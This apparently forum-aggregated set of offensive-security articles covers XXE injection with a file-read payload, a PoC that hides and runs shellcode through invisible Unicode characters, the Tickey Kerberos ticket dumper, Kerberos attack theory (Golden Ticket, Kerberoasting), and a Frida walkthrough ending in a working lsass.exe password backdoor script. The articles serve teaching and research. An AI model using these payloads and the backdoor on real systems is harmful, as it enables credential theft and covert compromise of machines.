    Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG.

    For example, an application might allow users to upload images, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.

    XXE attacks via modified content type

    Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.

    For example, if a normal request contains the following:

    POST /action HTTP/1.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 7

    foo=bar

    Then you might be able to submit the following request, with the same result:

    POST /action HTTP/1.0
    Content-Type: text/xml
    Content-Length: 52

    <?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

    If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format.
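Reformatting a form POST as XML takes only a few lines. A sketch with Python's standard library (the endpoint URL is a placeholder, not from the original article):

```python
import urllib.request

xml_body = b'<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>'

# Build the same POST, but with an XML body and an XML Content-Type
req = urllib.request.Request(
    "http://target.example/action",  # hypothetical endpoint
    data=xml_body,
    headers={"Content-Type": "text/xml"},
    method="POST",
)
# urllib.request.urlopen(req)  # send it once pointed at a real target
```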

    How to find and test for XXE vulnerabilities

    The vast majority of XXE vulnerabilities can be found quickly and reliably using Burp Suite's web vulnerability scanner.

    Manually testing for XXE vulnerabilities generally involves:

    • Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response.
    • Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose.
    • Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.

    How to prevent XXE vulnerabilities

    Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.

    Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.
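As an illustration of what this looks like in practice, Python's standard-library SAX parser exposes features for exactly this. This is a sketch; Expat-based parsers already skip external entities by default in recent Python versions, so the explicit settings mainly make the intent auditable:

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

class TextCollector(ContentHandler):
    """Collect character data so we can inspect what the parser produced."""
    def __init__(self):
        super().__init__()
        self.chunks = []
    def characters(self, content):
        self.chunks.append(content)

xxe_payload = (b'<?xml version="1.0" encoding="UTF-8"?>'
               b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
               b'<stockCheck><productId>&xxe;</productId></stockCheck>')

handler = TextCollector()
parser = xml.sax.make_parser()
parser.setContentHandler(handler)
parser.setFeature(feature_external_ges, False)  # no external general entities
parser.setFeature(feature_external_pes, False)  # no external parameter entities
parser.parse(io.BytesIO(xxe_payload))

print(repr("".join(handler.chunks)))  # should not contain the file contents
```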

     

    Sursa: https://portswigger.net/web-security/xxe

  5. PoC: Encoding Shellcode Into Invisible Unicode Characters

     
    Malware has long used Unicode to hide or obfuscate URLs, filenames, scripts, etc. The Right-to-Left Override character (e2 80 ae) is a classic. This post shares a PoC in which shellcode is hidden / encoded into a string in a Python script (this would probably work with other languages too), using invisible Unicode characters that most text editors will not display.

    The idea is quite simple. We will choose three "invisible" unicode characters:
     
    invisible_unicode.png

    e2 80 8b  :   bit 0
    e2 80 8c  :   bit 1
    e2 80 8d  :   delimiter

    With this, and having a potentially malicious script, we can encode the malicious script, bit by bit, into these unicode characters:

    (delimiter e2 80 8d)  .....encoded script (bit 0 to e2 80 8b, bit 1 to e2 80 8c)......   (delimiter e2 80 8d)
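The scheme is easy to reproduce. A minimal sketch in Python (my own illustration, not the author's encode.py; U+200B, U+200C and U+200D are the code points behind the UTF-8 sequences e2 80 8b, e2 80 8c and e2 80 8d):

```python
ZERO = "\u200b"   # e2 80 8b -> bit 0
ONE = "\u200c"    # e2 80 8c -> bit 1
DELIM = "\u200d"  # e2 80 8d -> delimiter

def encode(payload):
    """Encode bytes as an invisible run of zero-width characters."""
    bits = "".join(format(byte, "08b") for byte in payload)
    return DELIM + "".join(ONE if bit == "1" else ZERO for bit in bits) + DELIM

def decode(carrier):
    """Recover the hidden bytes from a string containing an encoded run."""
    hidden = carrier.split(DELIM)[1]
    bits = "".join("1" if ch == ONE else "0" for ch in hidden)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))

cover = "Hello" + encode(b"print('hi')") + " world"
print(cover)                    # renders as "Hello world" in most editors
assert decode(cover) == b"print('hi')"
```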

    I have used this simple script to encode the malicious script:

    https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/encode.py

    Now we can embed these encoded "invisible" Unicode characters into a string. The following source code looks like a simple hello world:

    https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/helloworld.py

     
    helloworld.png

    However, if you download and open the file with a hexadecimal editor, you can see all the encoded information that is part of the hello world string:
     
    helloworld_hex.png

    Most of the text editors that I tested didn't display the unicode characters: Visual Studio, Geany, Sublime, Notepad, browsers, etc...

    The following script decodes and executes a secondary potentially malicious python script (the PoC script only executes calc) from invisible unicode characters:

    https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious.py

    And the following script decodes a x64 shellcode (the shellcode executes calc) from invisible unicode characters, then it loads the shellcode with VirtualAlloc+WriteProtectMemory, and calls CreateThread to execute it:

    https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious2_x64_shellcode.py

    The previous scripts are quite obvious and suspicious, but if this encoded malicious script and these lines are mixed into a longer, more complicated source file, it would probably be harder to notice that the script contains malicious code. So be careful when you download your favorite exploits! ;)

    I have not tested it, but this will probably work with other languages. Visual Studio, for example, doesn't show these characters in C source code.
     
  6. Tickey

    Tool to extract Kerberos tickets from Linux kernel keys.

    Based on the paper Kerberos Credential Thievery (GNU/Linux).

    Building

    git clone https://github.com/TarlogicSecurity/tickey
    cd tickey/tickey
    make CONF=Release
    

    After that, binary should be in dist/Release/GNU-Linux/.

    Execution

    Arguments:

    • -i => To perform process injection if it is needed
    • -s => To not print in output (for injection)

    Important: when injecting into another process, tickey performs an execve syscall that invokes its own binary from the context of another user. Therefore, to perform a successful injection, the binary must be in a folder to which all users have access, such as /tmp.

    Execution example:

    [root@Lab-LSV01 /]# /tmp/tickey -i
    [*] krb5 ccache_name = KEYRING:session:sess_%{uid}
    [+] root detected, so... DUMP ALL THE TICKETS!!
    [*] Trying to inject in tarlogic[1000] session...
    [+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache
    [*] Trying to inject in velociraptor[1120601115] session...
    [+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache
    [*] Trying to inject in trex[1120601113] session...
    [+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache
    [X] [uid:0] Error retrieving tickets
    

    License

    This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details.

    You should have received a copy of the GNU Affero General Public License along with this program. If not, see https://www.gnu.org/licenses/.

    Author

    Eloy Pérez González @Zer1t0 at @Tarlogic - https://www.tarlogic.com/en/

    Acknowledgment

    Thanks to @TheXC3LL for his support with the binary injection.

     

    Sursa: https://github.com/TarlogicSecurity/tickey

  7. Kerberos (I): How does Kerberos work? – Theory

    20 - MAR - 2019 - ELOY PÉREZ

    The objective of this series of posts is to clarify how Kerberos works, rather than just introduce the attacks. This is because in many cases it is not clear why certain techniques work or not. Knowing this allows you to decide when to use each of those attacks in a pentest.

    Therefore, after a long journey of diving into the documentation and several posts about the topic, we’ve tried to collect in this post all the important details an auditor should know in order to understand how to take advantage of the Kerberos protocol.

    In this first post, only basic functionality will be discussed. Later posts will show how to perform the attacks and how the more complex aspects, such as delegation, work.

    If anything is not well explained, do not be afraid to leave a comment or question about it. Now, onto the topic.

    What is Kerberos?

    Firstly, Kerberos is an authentication protocol, not an authorization protocol. In other words, it identifies each user, who provides a secret password; however, it does not validate which resources or services that user can access.

    Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is the responsibility of each service to determine whether the user has access to its resources.

    Kerberos items

    In this section, several components of the Kerberos environment will be studied.

    Transport layer

    Kerberos uses either UDP or TCP as its transport protocol, both of which send data in cleartext. Because of this, Kerberos is responsible for providing its own encryption.

    The ports used by Kerberos are UDP/88 and TCP/88, which the KDC (explained in the next section) should be listening on.
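As a quick practical aside (my own sketch, not part of the original article), checking whether a host is listening on the Kerberos TCP port takes a few lines with Python's socket module; the hostname in the example is a placeholder:

```python
import socket

def kdc_reachable(host, port=88, timeout=2.0):
    """Return True if something accepts connections on the Kerberos TCP port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Example: kdc_reachable("dc01.corp.example")  # hypothetical domain controller
```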

    Agents

    Several agents work together to provide authentication in Kerberos. These are the following:

    • Client or user who wants to access the service.
    • AP (Application Server), which offers the service required by the user.
    • KDC (Key Distribution Center), the main service of Kerberos, responsible for issuing the tickets and installed on the DC (Domain Controller). It is supported by the AS (Authentication Service), which issues the TGTs.

    Encryption keys

    Kerberos handles several structures, such as tickets. Many of those structures are encrypted or signed to prevent tampering by third parties. The keys involved are the following:

    • KDC or krbtgt key, which is derived from the krbtgt account NTLM hash.
    • User key, which is derived from the user NTLM hash.
    • Service key, which is derived from the NTLM hash of the service owner, which can be a user or computer account.
    • Session key, which is negotiated between the user and the KDC.
    • Service session key, to be used between the user and the service.

    Tickets

    The main structures handled by Kerberos are the tickets. These tickets are delivered to users, who use them to perform several actions in the Kerberos realm. There are 2 types:

    • The TGS (Ticket Granting Service) is the ticket a user can use to authenticate against a service. It is encrypted with the service key.
    • The TGT (Ticket Granting Ticket) is the ticket presented to the KDC to request TGSs. It is encrypted with the KDC key.

    PAC

    The PAC (Privilege Attribute Certificate) is a structure included in almost every ticket. It contains the privileges of the user and is signed with the KDC key.

    Services can verify the PAC by communicating with the KDC, although this does not happen often. Nevertheless, PAC verification consists only of checking its signature, without inspecting whether the privileges inside the PAC are correct.

    Furthermore, a client can avoid the inclusion of the PAC inside the ticket by specifying it in the KERB-PA-PAC-REQUEST field of the ticket request.

    Messages

    Kerberos uses different kinds of messages. The most interesting are the following:

    • KRB_AS_REQ: Used to request the TGT from the KDC.
    • KRB_AS_REP: Used by the KDC to deliver the TGT.
    • KRB_TGS_REQ: Used to request a TGS from the KDC, using the TGT.
    • KRB_TGS_REP: Used by the KDC to deliver the TGS.
    • KRB_AP_REQ: Used to authenticate a user against a service, using the TGS.
    • KRB_AP_REP: (Optional) Used by the service to identify itself to the user.
    • KRB_ERROR: Message used to communicate error conditions.

    Additionally, although it is part of NRPC rather than Kerberos, the AP can optionally use the KERB_VERIFY_PAC_REQUEST message to send the PAC signature to the KDC and verify that it is correct.

    Below is a summary of the message sequence used to perform authentication:

    kerberos_message_summary-300x222.png

    Kerberos messages summary

    Authentication process

    In this section, the sequence of messages used to perform authentication will be studied, starting from a user without tickets and ending with one authenticated against the desired service.

    KRB_AS_REQ

    Firstly, the user must get a TGT from the KDC. To achieve this, a KRB_AS_REQ must be sent:

    KRB_AS_REQ.png

    KRB_AS_REQ schema message

    KRB_AS_REQ has, among others, the following fields:

    • A timestamp encrypted with the client key, to authenticate the user and prevent replay attacks
    • The username of the user being authenticated
    • The service SPN associated with the krbtgt account
    • A nonce generated by the user

    Note: the encrypted timestamp is only necessary if the user requires preauthentication, which is common unless the DONT_REQ_PREAUTH flag is set on the user account.

    KRB_AS_REP

    After receiving the request, the KDC verifies the user's identity by decrypting the timestamp. If the message is correct, it must respond with a KRB_AS_REP:

    KRB_AS_REP.png

    KRB_AS_REP schema message

    KRB_AS_REP includes the next information:

    • Username
    • TGT, which includes:
      • Username
      • Session key
      • Expiration date of TGT
      • PAC with user privileges, signed by KDC
    • Some encrypted data with user key, which includes:
      • Session key
      • Expiration date of TGT
      • User nonce, to prevent replay attacks

    Once this is finished, the user has the TGT, which can be used to request TGSs and afterwards access the services.

    KRB_TGS_REQ

    In order to request a TGS, a KRB_TGS_REQ message must be sent to the KDC:

    KRB_TGS_REQ-1.png

    KRB_TGS_REQ schema message

    KRB_TGS_REQ includes:

    • Encrypted data with session key:
      • Username
      • Timestamp
    • TGT
    • SPN of requested service
    • Nonce generated by user

    KRB_TGS_REP

    After receiving the KRB_TGS_REQ message, the KDC returns a TGS inside a KRB_TGS_REP:

    KRB_TGS_REP.png

    KRB_TGS_REP schema message

    KRB_TGS_REP includes:

    • Username
    • TGS, which contains:
      • Service session key
      • Username
      • Expiration date of TGS
      • PAC with user privileges, signed by KDC
    • Encrypted data with session key:
      • Service session key
      • Expiration date of TGS
      • User nonce, to prevent replay attacks

    KRB_AP_REQ

    To finish, if everything went well, the user has a valid TGS with which to interact with the service. To use it, the user must send the AP a KRB_AP_REQ message:

    KRB_AP_REQ.png

    KRB_AP_REQ schema message

    KRB_AP_REQ includes:

    • TGS
    • Encrypted data with service session key:
      • Username
      • Timestamp, to avoid replay attacks

    After that, if the user's privileges are right, the user can access the service. If configured to do so, which does not usually happen, the AP will verify the PAC against the KDC. Also, if mutual authentication is needed, it will respond to the user with a KRB_AP_REP message.

    Attacks

    Based on the authentication process explained above, this section describes the attacks aimed at compromising Active Directory.

    Overpass The Hash/Pass The Key (PTK)

    The popular Pass The Hash (PTH) attack consists of using the user's hash to impersonate that user. In the context of Kerberos, this is known as Overpass The Hash or Pass The Key.

    If an attacker gets the hash of any user, he can impersonate that user against the KDC and then gain access to several services.

    User hashes can be extracted from the SAM files of workstations or the NTDS.DIT file of DCs, as well as from lsass process memory (using Mimikatz), where it is also possible to find cleartext passwords.

    Pass The Ticket (PTT)

    The Pass The Ticket technique consists of getting a user's ticket and using it to impersonate that user. However, besides the ticket, it is also necessary to obtain the session key in order to use the ticket.

    It is possible to obtain the ticket by performing a Man-in-the-Middle attack, since Kerberos is sent over TCP or UDP. However, this technique does not give access to the session key.

    An alternative is getting the ticket from lsass process memory, where the session key also resides. This procedure can be performed with Mimikatz.

    It is better to obtain a TGT, since a TGS can only be used against one service. Also, keep in mind that the lifetime of tickets is 10 hours; after that, they are unusable.

    Golden Ticket and Silver Ticket

    The objective of a Golden Ticket is to forge a TGT. To do so, it is necessary to obtain the NTLM hash of the krbtgt account. Once that is obtained, a TGT with an arbitrary user and privileges can be built.

    Moreover, even if the user changes his password, the ticket will still be valid. The TGT can only be invalidated if it expires or the krbtgt account changes its password.

    A Silver Ticket is similar; however, this time the forged ticket is a TGS. In this case the service key is required, which is derived from the service owner account. Nevertheless, it is not possible to sign the PAC correctly without the krbtgt key. Therefore, if the service verifies the PAC, this technique will not work.

    Kerberoasting

    Kerberoasting is a technique which takes advantage of TGSs to crack user account passwords offline.

    As seen above, a TGS is encrypted with the service key, which is derived from the NTLM hash of the service owner account. Usually, the owners of services are the computers on which the services run. However, computer passwords are very complex, so it is not useful to try to crack those. The same applies to the krbtgt account, so TGTs are not crackable either.

    All the same, on some occasions the owner of a service is a normal user account. In these cases it is more feasible to crack the password. Moreover, this sort of account often has very juicy privileges. Additionally, only a normal domain account is needed to get a TGS for any service, since Kerberos does not perform authorization checks.

    ASREPRoast

    ASREPRoast is similar to Kerberoasting, in that it also aims to crack account passwords.

    If the DONT_REQ_PREAUTH attribute is set on a user account, it is possible to build a KRB_AS_REQ message for it without specifying its password.

    After that, the KDC will respond with a KRB_AS_REP message, which will contain information encrypted with the user key. Thus, this message can be used to crack the user's password.

    Conclusion

    In this first post, the Kerberos authentication process has been studied and the attacks have been introduced. The following posts will show how to perform these attacks in a practical way, and also how delegation works. I really hope this post helps in understanding some of the more abstract concepts of Kerberos.

    References

     
  8. recreating known universal windows password backdoors with Frida

    Reading time ~20 min
    Posted by leon on 23 April 2019
    Categories: Backdoor, Frida, Lsass, Windows, Password

    tl;dr

    I have been actively using Frida for a little over a year now, but primarily on mobile devices while building the objection toolkit. My interest in using it on other platforms has been growing, and I decided to play with it on Windows to get a feel. I needed an objective, and decided to try to port a well-known local Windows password backdoor to Frida. This post is mostly about the process of how Frida will let you quickly investigate and prototype using dynamic instrumentation.

    the setup

    Before I could do anything, I had to install and configure Frida. I used the standard Python-based Frida environment as this includes tooling for really easy, rapid development. I just had to install a Python distribution on Windows, followed by a pip install frida frida-tools.

    With Frida configured, the next question was what to target? Given that anything passwords related is usually interesting, I decided on the Windows Local Security Authority Subsystem Service (lsass.exe). I knew there was a lot of existing knowledge that could be referenced for lsass, especially when considering projects such as Mimikatz, but decided to venture down the path of discovery alone. I figured I’d start by attaching Frida to lsass.exe and enumerate the process a little. Currently loaded modules and any module exports were of interest to me. I started by simply typing frida lsass.exeto attach to the process from an elevated command prompt (Runas Administrator -> accept UAC prompt), and failed pretty hard:

    • Screenshot_2019-04-22_at_15_56_44-1024x5 RtlCreateUserThread returned 0xc0000022

    Running Frida from a PowerShell prompt worked fine though:

    • Screenshot-2019-04-22-at-16.05.07-1024x3 Frida attached to lsass.exe

    Turns out, SeDebugPrivilege was not granted by default for the command prompt in my Windows 10 installation, but was when invoking PowerShell.

    • Screenshot_2019-04-22_at_16_06_53-1024x6 SeDebugPrivilege disabled in an Administrator command prompt

    With that out of the way, let’s write some scripts to enumerate lsass! I started simple, with only a Process.enumerateModules() call, iterating the results and printing the module name. This would tell me which modules were currently loaded in lsass.

    • Screenshot-2019-04-22-at-16.15.57-1024x8 lsass module enumeration

    Some Googling of the loaded DLLs, as well as exports enumeration, had me focus on the msv1_0.DLL Authentication Package first. This authentication package was described as the one responsible for local machine logons, and a prime candidate for our shenanigans. Frida has a utility called frida-trace (part of the frida-tools package) which can be used to “trace” function calls within a DLL. So, I went ahead and traced the msv1_0.dll DLL while performing a local interactive login using runas.

    • Screenshot-2019-04-22-at-16.45.14-1024x6 msv1_0.dll exports, viewed in IDA Free
    • Screenshot-2019-04-22-at-16.48.42-1024x4 frida-trace output for the msv1_0.dll when performing two local, interactive authentication actions

    As you can see, frida-trace makes it suuuuuper simple to get a quick idea of what may be happening under the hood, showing a flow of LsaApCallPackageUntrusted() -> MsvSamValidate(), followed by two LsaApLogonTerminated() calls when I invoke runas /user:user cmd. Without studying the function prototype for MsvSamValidate(), I decided to take a look at what the return values would be for the function (if any) with a simple log(retval) statement in the onLeave() function. This function was part of the autogenerated handlers that frida-trace creates for any matched methods it should trace, dumping a small JavaScript snippet in the __handlers__ directory.

    • Screenshot_2019-04-22_at_17_29_12.png MsvValidate return values

    A naive assumption at this stage was that if the supplied credentials were incorrect, MsvSamValidate() would simply return a non-NULL value (which may be an error code or something). The hook does not consider what the method is actually doing (or that there may be further function calls that may be more interesting), especially in the case of valid authentication, but I figured I’d give overriding the return value a shot, even if an invalid set of credentials were supplied. Editing the handler generated by frida-trace, I added a retval.replace(0x0) statement to the onLeave() method, and tried to auth…

    • Screenshot-2019-04-22-at-17.47.21-1024x2 One dead Windows Computer

    Turns out, LSASS is not that forgiving when you tamper with its internals :P I had no expectation that this was going to work, but it proved an interesting exercise nonetheless. From here, I had to resort to actually understanding MsvSamValidate() before I could get anything useful done with it.

    backdoor – approach #1

    Playing with MsvSamValidate() did not yield much in terms of an interesting hook, but researching LSASS and Authentication Packages online led me to this article, which described a “universal” password backdoor for any local Windows account. I figured this may be an interesting one to look at, and so a new script began that focused on RtlCompareMemory. According to the article, RtlCompareMemory would be called to finally compare the MD4 value from a local SAM database with a calculated MD4 of a provided password. The blog post also included some sample code to demonstrate the backdoor, which implements a hardcoded password to trigger a successful authentication scenario. From the MSDN docs, RtlCompareMemory takes three arguments, where the first two are pointers. The third argument is a count of the number of bytes to compare. The function simply returns a value indicating how many bytes from the two blocks of memory were the same. In the case of an MD4 comparison, if 16 bytes are the same, then the two blocks are considered equal, and the RtlCompareMemory function will return 0x10.

    To understand how RtlCompareMemory was used from an LSASS perspective, I decided to use frida-trace to visualise invocations of the function. This was a really cheap attempt considering that I already knew this specific function was interesting. I did not have to find out which DLLs may export this function or anything; frida-trace does all of that for us after simply specifying the target function name.

    • Screenshot: Unfiltered RtlCompareMemory invocations from within lsass.exe

    The RtlCompareMemory function was resolved in both kernel32.dll as well as in ntdll.dll. I focused on ntdll.dll, but it turns out it could work with either. Upon invocation, without even attempting to authenticate to anything, the output was racing past in the terminal, making it impossible to follow (as you can see by the “ms” readings in the above screenshot). I needed to get the output filtered, showing only the relevant invocations. The first question I had was: “Are these calls from kernel32 or ntdll?”, so I added a module string to the autogenerated frida-trace handler to distinguish the two.

    • Screenshot: Module information added to log() calls

    Running the modified handlers, I noticed that the RtlCompareMemory function in both modules was being called, every time. Interesting. Next, I decided to log the lengths that were being compared. Maybe there is a difference? Remember, RtlCompareMemory receives a third argument for the length, so we could just dump that value from memory.

    • Screenshot: RtlCompareMemory size argument dumping

    So even the size was the same for the RtlCompareMemory calls in both of the identified modules. At this stage, I decided to focus on the function in ntdll.dll, and ignore the kernel32.dll module for now. I also dumped the bytes of what was being compared to screen so that I could get some indication of the data involved. Frida has a hexdump helper specifically for this!

    • Screenshot: RtlCompareMemory block contents

    I observed the output for a while to see if I could spot any patterns, especially while performing authentication. The password for the user account I configured was… password, and eventually, I spotted it as one of the blocks RtlCompareMemory had to compare.

    • Screenshot: ASCII, NULL-padded password spotted as one of the memory blocks used in RtlCompareMemory

    I also noticed that many different block sizes were being compared using RtlCompareMemory. As the local Windows SAM database stores the password for an account as an MD4 hash, these hashes can be represented as 16 bytes in memory. As RtlCompareMemory gets the length of bytes to compare, I decided to filter the output to only report cases where 16 bytes were to be compared. This is also how the code in the previously mentioned blog post filters candidates to check for the backdoor password. This time round, the output generated by frida-trace was much more readable and I could get a better idea of what was going on. An analysis of the output yielded the following results:

    • When providing the correct, and incorrect password to the runas command, the RtlCompareMemory function is called five times.
    • The first eight characters of the password entered appear padded with a 0x00 byte between each character, most likely due to UTF-16 (Unicode) encoding, making up a 16 byte stream that gets compared with something else (unknown value).
    • The fourth call to RtlCompareMemory appears to compare against the hash from the SAM database, which is provided as arg[0]. The password for the test account was password, which has an MD4 hash value of 8846f7eaee8fb117ad06bdd830b7586c.
    • Screenshot: Five calls to RtlCompareMemory (incl. memory block contents) that wanted to compare 16 bytes when providing an invalid password of testing123
    • Screenshot: Five calls to RtlCompareMemory (incl. memory block contents) that wanted to compare 16 bytes when providing a valid password of password
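The 0x00 padding observed between the password characters is consistent with the password being UTF-16LE encoded before hashing; a quick Python check illustrates the effect:

```python
password = "password"
encoded = password.encode("utf-16-le")

# Each ASCII character becomes two bytes, the second one 0x00, yielding
# the 16-byte "null padded" stream seen in the frida-trace hexdumps
print(encoded.hex(" "))  # 70 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00
print(len(encoded))      # 16
```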

    At this point I figured I should log the function return values as well, just to get an idea of what a success and failure condition looks like. I made two more authentication attempts using runas, one with a valid password and one with an invalid password, observing what the RtlCompareMemory function returns.

    • Screenshot: RtlCompareMemory return values

    The fourth call to RtlCompareMemory returns the number of bytes that matched in the successful case (which was actually the MD4 comparison), which should be 16 (indicated by the hex 0x10). Considering what we had learnt so far, I naively assumed I could make a “universal backdoor” by simply returning 0x10 for any call to RtlCompareMemory that wanted to compare 16 bytes, originating from within LSASS. This would mean that any password would work, right? I updated the frida-trace handler to simply call retval.replace(0x10) in the onLeave method, indicating that 16 bytes matched, and tested!

    • Screenshot: Authentication failure after aggressively overriding the return value for RtlCompareMemory

    Instead of successfully authenticating, the number of times RtlCompareMemory got called was reduced to only two invocations (usually it would be five), and the authentication attempt completely failed, even when the correct password was provided. I wasn’t as lucky as I had hoped for. I figured this may be because of the overrides, and I may be breaking other internals where a return for RtlCompareMemory may be used in a negative test.

    For plan B, I decided to simply recreate the backdoor of the original blog post. That means only returning the check as successful (in other words, returning 0x10 from the RtlCompareMemory function) when authenticating with a specific password. We learnt in previous tests that the fourth invocation of RtlCompareMemory compares the two buffers of the calculated MD4 of the supplied password and the MD4 from the local SAM database. So, for the backdoor to trigger, we should embed the MD4 of a password we know, and trigger when that is supplied. I used a small python2 one-liner to generate an MD4 of the word backdoor formatted as an array you can use in JavaScript:

    import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()])

    When run in a python2 interpreter, the one-liner should output something like [22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]. This is a byte array that could be used in a Frida script to check if the supplied password was backdoor, and if so, return 0x10 from the RtlCompareMemory function. This should also prevent the case where blindly returning 0x10 for any 16 byte comparison using RtlCompareMemory breaks other stuff.
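Note that on many modern Python 3 builds, hashlib no longer exposes the legacy 'md4' algorithm (it depends on the underlying OpenSSL), so the one-liner above may fail. As a self-contained fallback, here is a sketch using a pure-Python MD4 (RFC 1320); this is my own illustrative implementation, not code from the original post:

```python
import struct

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    mask = 0xFFFFFFFF

    def lrot(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    # Pad: append 0x80, zeros to 56 mod 64, then bit length as little-endian u64
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F = (b & c) | (~b & d)
            f = (b & c) | (~b & d)
            a, b, c, d = d, lrot((a + f + x[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G = majority(b, c, d)
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, lrot((a + g + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H = b ^ c ^ d
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, lrot((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)

# NT hash of "password" (MD4 over the UTF-16LE encoding)
print(md4("password".encode("utf-16-le")).hex())  # 8846f7eaee8fb117ad06bdd830b7586c
# Byte array for the "backdoor" password, as embedded in the Frida script
print(list(md4("backdoor".encode("utf-16-le"))))
```

Running `list(md4("backdoor".encode("utf-16-le")))` should reproduce the byte array shown above.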

    Up until now we have been using frida-trace and its autogenerated handlers to interact with the RtlCompareMemory function. While this was perfect for quickly interacting with the target function, a more robust way is preferable in the long term. Ideally, we want to make sharing a simple JavaScript snippet easy. To replicate the functionality we have been using up until now, we can use the Frida Interceptor API, providing the address of ntdll!RtlCompareMemory and performing our logic there as we have in the past using the autogenerated handler. We can find the address of our function using the Module API, calling getExportByName on it.

    // from: https://github.com/sensepost/frida-windows-playground/blob/master/RtlCompareMemory_backdoor.js
    
    const RtlCompareMemory = Module.getExportByName('ntdll.dll', 'RtlCompareMemory');
    
    // generate bytearrays with python:
    // import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()])
    //const newPassword = new Uint8Array([136, 70, 247, 234, 238, 143, 177, 23, 173, 6, 189, 216, 48, 183, 88, 108]); // password
    const newPassword = new Uint8Array([22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]); // backdoor
    
    Interceptor.attach(RtlCompareMemory, {
      onEnter: function (args) {
        this.compare = 0;
        if (args[2] == 0x10) {
          const attempt = new Uint8Array(ptr(args[1]).readByteArray(16));
          this.compare = 1;
          this.original = attempt;
        }
      },
      onLeave: function (retval) {
        if (this.compare == 1) {
          var match = true;
          for (var i = 0; i != this.original.byteLength; i++) {
            if (this.original[i] != newPassword[i]) {
              match = false;
            }
          }
    
          if (match) {
            retval.replace(16);
          }
        }
      }
    });

    The resultant script means that one can authenticate using any local account with the password backdoor when invoking Frida with frida lsass.exe -l .\backdoor.js from an Administrative PowerShell prompt.

    backdoor – approach #2

    Our backdoor approach has a few limitations; the first being that network logons (such as ones initiated using smbclient) don’t appear to work with the backdoor password, the second being that I wanted any password to work, not just backdoor (or whatever you embed in the script). Using the script we had already written, I decided to take a closer look and try to figure out what was calling RtlCompareMemory.

    I love backtraces, and generating those with Frida is really simple using the backtrace() method on the Thread module. With a backtrace we should be able to see exactly where a call to RtlCompareMemory came from and extend our investigation a little further.

    • Screenshot: Backtraces printed for each invocation of RtlCompareMemory

